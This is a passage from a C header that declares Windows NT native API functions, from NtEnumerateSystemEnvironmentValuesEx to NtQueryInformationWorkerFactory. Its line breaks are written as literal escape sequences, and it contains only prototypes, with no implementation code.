NTSTATUS NtEnumerateSystemEnvironmentValuesEx(\r\n\tIN ULONG InformationClass,\r\n\tOUT PVOID Buffer,\r\n\tIN OUT PULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateTransactionObject(\r\n\tIN HANDLE RootObjectHandle OPTIONAL,\r\n\tIN KTMOBJECT_TYPE QueryType,\r\n\tIN OUT PKTMOBJECT_CURSOR ObjectCursor,\r\n\tIN ULONG ObjectCursorLength,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtExtendSection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN OUT PLARGE_INTEGER NewSectionSize);\r\n\r\nEXTERN_C NTSTATUS NtFilterBootOption(\r\n\tIN FILTER_BOOT_OPTION_OPERATION FilterOperation,\r\n\tIN ULONG ObjectType,\r\n\tIN ULONG ElementType,\r\n\tIN PVOID SystemData OPTIONAL,\r\n\tIN ULONG DataSize);\r\n\r\nEXTERN_C NTSTATUS NtFilterToken(\r\n\tIN HANDLE ExistingTokenHandle,\r\n\tIN ULONG Flags,\r\n\tIN PTOKEN_GROUPS SidsToDisable OPTIONAL,\r\n\tIN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,\r\n\tIN PTOKEN_GROUPS RestrictedSids OPTIONAL,\r\n\tOUT PHANDLE NewTokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtFilterTokenEx(\r\n\tIN HANDLE TokenHandle,\r\n\tIN ULONG Flags,\r\n\tIN PTOKEN_GROUPS SidsToDisable OPTIONAL,\r\n\tIN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,\r\n\tIN PTOKEN_GROUPS RestrictedSids OPTIONAL,\r\n\tIN ULONG DisableUserClaimsCount,\r\n\tIN PUNICODE_STRING UserClaimsToDisable OPTIONAL,\r\n\tIN ULONG DisableDeviceClaimsCount,\r\n\tIN PUNICODE_STRING DeviceClaimsToDisable OPTIONAL,\r\n\tIN PTOKEN_GROUPS DeviceGroupsToDisable OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedUserAttributes OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedDeviceAttributes OPTIONAL,\r\n\tIN PTOKEN_GROUPS RestrictedDeviceGroups OPTIONAL,\r\n\tOUT PHANDLE NewTokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtFlushBuffersFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN ULONG Flags,\r\n\tIN PVOID Parameters,\r\n\tIN ULONG ParametersSize,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtFlushInstallUILanguage(\r\n\tIN LANGID InstallUILanguage,\r\n\tIN ULONG SetComittedFlag);\r\n\r\nEXTERN_C NTSTATUS NtFlushInstructionCache(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtFlushKey(\r\n\tIN HANDLE KeyHandle);\r\n\r\nEXTERN_C NTSTATUS NtFlushProcessWriteBuffers();\r\n\r\nEXTERN_C NTSTATUS NtFlushVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN OUT PULONG RegionSize,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtFlushWriteBuffer();\r\n\r\nEXTERN_C NTSTATUS NtFreeUserPhysicalPages(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PULONG NumberOfPages,\r\n\tIN PULONG UserPfnArray);\r\n\r\nEXTERN_C NTSTATUS NtFreezeRegistry(\r\n\tIN ULONG TimeOutInSeconds);\r\n\r\nEXTERN_C NTSTATUS NtFreezeTransactions(\r\n\tIN PLARGE_INTEGER FreezeTimeout,\r\n\tIN PLARGE_INTEGER ThawTimeout);\r\n\r\nEXTERN_C NTSTATUS NtGetCachedSigningLevel(\r\n\tIN HANDLE File,\r\n\tOUT PULONG Flags,\r\n\tOUT PSE_SIGNING_LEVEL SigningLevel,\r\n\tOUT PUCHAR Thumbprint OPTIONAL,\r\n\tIN OUT PULONG ThumbprintSize OPTIONAL,\r\n\tOUT PULONG ThumbprintAlgorithm OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetCompleteWnfStateSubscription(\r\n\tIN PCWNF_STATE_NAME OldDescriptorStateName OPTIONAL,\r\n\tIN PLARGE_INTEGER OldSubscriptionId OPTIONAL,\r\n\tIN ULONG OldDescriptorEventMask OPTIONAL,\r\n\tIN ULONG OldDescriptorStatus OPTIONAL,\r\n\tOUT PWNF_DELIVERY_DESCRIPTOR NewDeliveryDescriptor,\r\n\tIN ULONG DescriptorSize);\r\n\r\nEXTERN_C NTSTATUS NtGetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PCONTEXT ThreadContext);\r\n\r\nEXTERN_C NTSTATUS NtGetCurrentProcessorNumber();\r\n\r\nEXTERN_C NTSTATUS NtGetCurrentProcessorNumberEx(\r\n\tOUT PULONG ProcNumber OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetDevicePowerState(\r\n\tIN HANDLE Device,\r\n\tOUT PDEVICE_POWER_STATE State);\r\n\r\nEXTERN_C NTSTATUS NtGetMUIRegistryInfo(\r\n\tIN ULONG Flags,\r\n\tIN OUT PULONG DataSize,\r\n\tOUT PVOID SystemData);\r\n\r\nEXTERN_C NTSTATUS NtGetNextProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tIN ULONG Flags,\r\n\tOUT PHANDLE NewProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtGetNextThread(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tIN ULONG Flags,\r\n\tOUT PHANDLE NewThreadHandle);\r\n\r\nEXTERN_C NTSTATUS NtGetNlsSectionPtr(\r\n\tIN ULONG SectionType,\r\n\tIN ULONG SectionData,\r\n\tIN PVOID ContextData,\r\n\tOUT PVOID SectionPointer,\r\n\tOUT PULONG SectionSize);\r\n\r\nEXTERN_C NTSTATUS NtGetNotificationResourceManager(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tOUT PTRANSACTION_NOTIFICATION TransactionNotification,\r\n\tIN ULONG NotificationLength,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tOUT PULONG ReturnLength OPTIONAL,\r\n\tIN ULONG Asynchronous,\r\n\tIN ULONG AsynchronousContext OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetWriteWatch(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ULONG Flags,\r\n\tIN PVOID BaseAddress,\r\n\tIN ULONG RegionSize,\r\n\tOUT PULONG UserAddressArray,\r\n\tIN OUT PULONG EntriesInUserAddressArray,\r\n\tOUT PULONG Granularity);\r\n\r\nEXTERN_C NTSTATUS NtImpersonateAnonymousToken(\r\n\tIN HANDLE ThreadHandle);\r\n\r\nEXTERN_C NTSTATUS NtImpersonateThread(\r\n\tIN HANDLE ServerThreadHandle,\r\n\tIN HANDLE ClientThreadHandle,\r\n\tIN PSECURITY_QUALITY_OF_SERVICE SecurityQos);\r\n\r\nEXTERN_C NTSTATUS NtInitializeEnclave(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID EnclaveInformation,\r\n\tIN ULONG EnclaveInformationLength,\r\n\tOUT PULONG EnclaveError OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtInitializeNlsFiles(\r\n\tOUT PVOID BaseAddress,\r\n\tOUT PLCID DefaultLocaleId,\r\n\tOUT PLARGE_INTEGER DefaultCasingTableSize);\r\n\r\nEXTERN_C NTSTATUS NtInitializeRegistry(\r\n\tIN USHORT BootCondition);\r\n\r\nEXTERN_C NTSTATUS NtInitiatePowerAction(\r\n\tIN POWER_ACTION SystemAction,\r\n\tIN SYSTEM_POWER_STATE LightestSystemState,\r\n\tIN ULONG Flags,\r\n\tIN BOOLEAN Asynchronous);\r\n\r\nEXTERN_C NTSTATUS NtIsSystemResumeAutomatic();\r\n\r\nEXTERN_C NTSTATUS NtIsUILanguageComitted();\r\n\r\nEXTERN_C NTSTATUS NtListenPort(\r\n\tIN HANDLE PortHandle,\r\n\tOUT PPORT_MESSAGE ConnectionRequest);\r\n\r\nEXTERN_C NTSTATUS NtLoadDriver(\r\n\tIN PUNICODE_STRING DriverServiceName);\r\n\r\nEXTERN_C NTSTATUS NtLoadEnclaveData(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID Buffer,\r\n\tIN SIZE_T BufferSize,\r\n\tIN ULONG Protect,\r\n\tIN PVOID PageInformation,\r\n\tIN ULONG PageInformationLength,\r\n\tOUT PSIZE_T NumberOfBytesWritten OPTIONAL,\r\n\tOUT PULONG EnclaveError OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtLoadHotPatch(\r\n\tIN PUNICODE_STRING HotPatchName,\r\n\tIN ULONG LoadFlag);\r\n\r\nEXTERN_C NTSTATUS NtLoadKey(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN POBJECT_ATTRIBUTES SourceFile);\r\n\r\nEXTERN_C NTSTATUS NtLoadKey2(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN POBJECT_ATTRIBUTES SourceFile,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtLoadKeyEx(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN POBJECT_ATTRIBUTES SourceFile,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE TrustClassKey OPTIONAL,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess OPTIONAL,\r\n\tOUT PHANDLE RootHandle OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatus OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtLockFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PULARGE_INTEGER ByteOffset,\r\n\tIN PULARGE_INTEGER Length,\r\n\tIN ULONG Key,\r\n\tIN BOOLEAN FailImmediately,\r\n\tIN BOOLEAN ExclusiveLock);\r\n\r\nEXTERN_C NTSTATUS NtLockProductActivationKeys(\r\n\tIN OUT PULONG pPrivateVer OPTIONAL,\r\n\tOUT PULONG pSafeMode OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtLockRegistryKey(\r\n\tIN HANDLE KeyHandle);\r\n\r\nEXTERN_C NTSTATUS NtLockVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PULONG RegionSize,\r\n\tIN ULONG MapType);\r\n\r\nEXTERN_C NTSTATUS NtMakePermanentObject(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtMakeTemporaryObject(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtManagePartition(\r\n\tIN HANDLE TargetHandle,\r\n\tIN HANDLE SourceHandle,\r\n\tIN MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,\r\n\tIN OUT PVOID PartitionInformation,\r\n\tIN ULONG PartitionInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtMapCMFModule(\r\n\tIN ULONG What,\r\n\tIN ULONG Index,\r\n\tOUT PULONG CacheIndexOut OPTIONAL,\r\n\tOUT PULONG CacheFlagsOut OPTIONAL,\r\n\tOUT PULONG ViewSizeOut OPTIONAL,\r\n\tOUT PVOID BaseAddress OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtMapUserPhysicalPages(\r\n\tIN PVOID VirtualAddress,\r\n\tIN PULONG NumberOfPages,\r\n\tIN PULONG UserPfnArray OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtMapViewOfSectionEx(\r\n\tIN HANDLE SectionHandle,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PLARGE_INTEGER SectionOffset,\r\n\tIN OUT PPVOID BaseAddress,\r\n\tIN OUT PSIZE_T ViewSize,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Protect,\r\n\tIN OUT PVOID DataBuffer OPTIONAL,\r\n\tIN ULONG DataCount);\r\n\r\nEXTERN_C NTSTATUS NtModifyBootEntry(\r\n\tIN PBOOT_ENTRY BootEntry);\r\n\r\nEXTERN_C NTSTATUS NtModifyDriverEntry(\r\n\tIN PEFI_DRIVER_ENTRY DriverEntry);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeDirectoryFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PFILE_NOTIFY_INFORMATION Buffer,\r\n\tIN ULONG Length,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeDirectoryFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree,\r\n\tIN DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN ULONG BufferSize,\r\n\tIN BOOLEAN Asynchronous);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeMultipleKeys(\r\n\tIN HANDLE MasterKeyHandle,\r\n\tIN ULONG Count OPTIONAL,\r\n\tIN POBJECT_ATTRIBUTES SubordinateObjects OPTIONAL,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN ULONG BufferSize,\r\n\tIN BOOLEAN Asynchronous);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeSession(\r\n\tIN HANDLE SessionHandle,\r\n\tIN ULONG ChangeSequenceNumber,\r\n\tIN PLARGE_INTEGER ChangeTimeStamp,\r\n\tIN IO_SESSION_EVENT Event,\r\n\tIN IO_SESSION_STATE NewState,\r\n\tIN IO_SESSION_STATE PreviousState,\r\n\tIN PVOID Payload OPTIONAL,\r\n\tIN ULONG PayloadSize);\r\n\r\nEXTERN_C NTSTATUS NtOpenEnlistment(\r\n\tOUT PHANDLE EnlistmentHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN LPGUID EnlistmentGuid,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenEventPair(\r\n\tOUT PHANDLE EventPairHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenIoCompletion(\r\n\tOUT PHANDLE IoCompletionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenJobObject(\r\n\tOUT PHANDLE JobHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyEx(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG OpenOptions);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyTransacted(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN HANDLE TransactionHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyTransactedEx(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG OpenOptions,\r\n\tIN HANDLE TransactionHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyedEvent(\r\n\tOUT PHANDLE KeyedEventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenMutant(\r\n\tOUT PHANDLE MutantHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ACCESS_MASK GrantedAccess,\r\n\tIN PPRIVILEGE_SET Privileges OPTIONAL,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tIN BOOLEAN AccessGranted,\r\n\tOUT PBOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtOpenPartition(\r\n\tOUT PHANDLE PartitionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenPrivateNamespace(\r\n\tOUT PHANDLE NamespaceHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PVOID BoundaryDescriptor);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcessToken(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenRegistryTransaction(\r\n\tOUT PHANDLE RegistryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenResourceManager(\r\n\tOUT PHANDLE ResourceManagerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE TmHandle,\r\n\tIN LPGUID ResourceManagerGuid OPTIONAL,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenSemaphore(\r\n\tOUT PHANDLE SemaphoreHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenSession(\r\n\tOUT PHANDLE SessionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenSymbolicLinkObject(\r\n\tOUT PHANDLE LinkHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenTimer(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenTransaction(\r\n\tOUT PHANDLE TransactionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN LPGUID Uow,\r\n\tIN HANDLE TmHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenTransactionManager(\r\n\tOUT PHANDLE TmHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PUNICODE_STRING LogFileName OPTIONAL,\r\n\tIN LPGUID TmIdentity OPTIONAL,\r\n\tIN ULONG OpenOptions OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPlugPlayControl(\r\n\tIN PLUGPLAY_CONTROL_CLASS PnPControlClass,\r\n\tIN OUT PVOID PnPControlData,\r\n\tIN ULONG PnPControlDataLength);\r\n\r\nEXTERN_C NTSTATUS NtPrePrepareComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrePrepareEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrepareComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrepareEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrivilegeCheck(\r\n\tIN HANDLE ClientToken,\r\n\tIN OUT PPRIVILEGE_SET RequiredPrivileges,\r\n\tOUT PBOOLEAN Result);\r\n\r\nEXTERN_C NTSTATUS NtPrivilegeObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN PPRIVILEGE_SET Privileges,\r\n\tIN BOOLEAN AccessGranted);\r\n\r\nEXTERN_C NTSTATUS NtPrivilegedServiceAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PUNICODE_STRING ServiceName,\r\n\tIN HANDLE ClientToken,\r\n\tIN PPRIVILEGE_SET Privileges,\r\n\tIN BOOLEAN AccessGranted);\r\n\r\nEXTERN_C NTSTATUS NtPropagationComplete(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN ULONG RequestCookie,\r\n\tIN ULONG BufferLength,\r\n\tIN PVOID Buffer);\r\n\r\nEXTERN_C NTSTATUS NtPropagationFailed(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN ULONG RequestCookie,\r\n\tIN NTSTATUS PropStatus);\r\n\r\nEXTERN_C NTSTATUS NtPulseEvent(\r\n\tIN HANDLE EventHandle,\r\n\tOUT PULONG PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryAuxiliaryCounterFrequency(\r\n\tOUT PULONGLONG lpAuxiliaryCounterFrequency);\r\n\r\nEXTERN_C NTSTATUS NtQueryBootEntryOrder(\r\n\tOUT PULONG Ids OPTIONAL,\r\n\tIN OUT PULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtQueryBootOptions(\r\n\tOUT PBOOT_OPTIONS BootOptions OPTIONAL,\r\n\tIN OUT PULONG BootOptionsLength);\r\n\r\nEXTERN_C NTSTATUS NtQueryDebugFilterState(\r\n\tIN ULONG ComponentId,\r\n\tIN ULONG Level);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass,\r\n\tIN ULONG QueryFlags,\r\n\tIN PUNICODE_STRING FileName OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryObject(\r\n\tIN HANDLE DirectoryHandle,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN ULONG Length,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN BOOLEAN RestartScan,\r\n\tIN OUT PULONG Context,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDriverEntryOrder(\r\n\tIN PULONG Ids OPTIONAL,\r\n\tIN OUT PULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtQueryEaFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PFILE_FULL_EA_INFORMATION Buffer,\r\n\tIN ULONG Length,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PFILE_GET_EA_INFORMATION EaList OPTIONAL,\r\n\tIN ULONG EaListLength,\r\n\tIN PULONG EaIndex OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQueryFullAttributesFile(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PFILE_NETWORK_OPEN_INFORMATION FileInformation);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationAtom(\r\n\tIN USHORT Atom,\r\n\tIN ATOM_INFORMATION_CLASS AtomInformationClass,\r\n\tOUT PVOID AtomInformation,\r\n\tIN ULONG AtomInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationByName(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,\r\n\tOUT PVOID EnlistmentInformation,\r\n\tIN ULONG EnlistmentInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN JOBOBJECTINFOCLASS JobObjectInformationClass,\r\n\tOUT PVOID JobObjectInformation,\r\n\tIN ULONG JobObjectInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PORT_INFORMATION_CLASS PortInformationClass,\r\n\tOUT PVOID PortInformation,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationResourceManager(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,\r\n\tOUT PVOID ResourceManagerInformation,\r\n\tIN ULONG ResourceManagerInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN TRANSACTION_INFORMATION_CLASS TransactionInformationClass,\r\n\tOUT PVOID TransactionInformation,\r\n\tIN ULONG TransactionInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationTransactionManager(\r\n\tIN HANDLE TransactionManagerHandle,\r\n\tIN TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass,\r\n\tOUT PVOID TransactionManagerInformation,\r\n\tIN ULONG TransactionManagerInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tIN WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,\r\n\tOUT PVOID WorkerFactoryInformation,\r\n\tIN ULONG 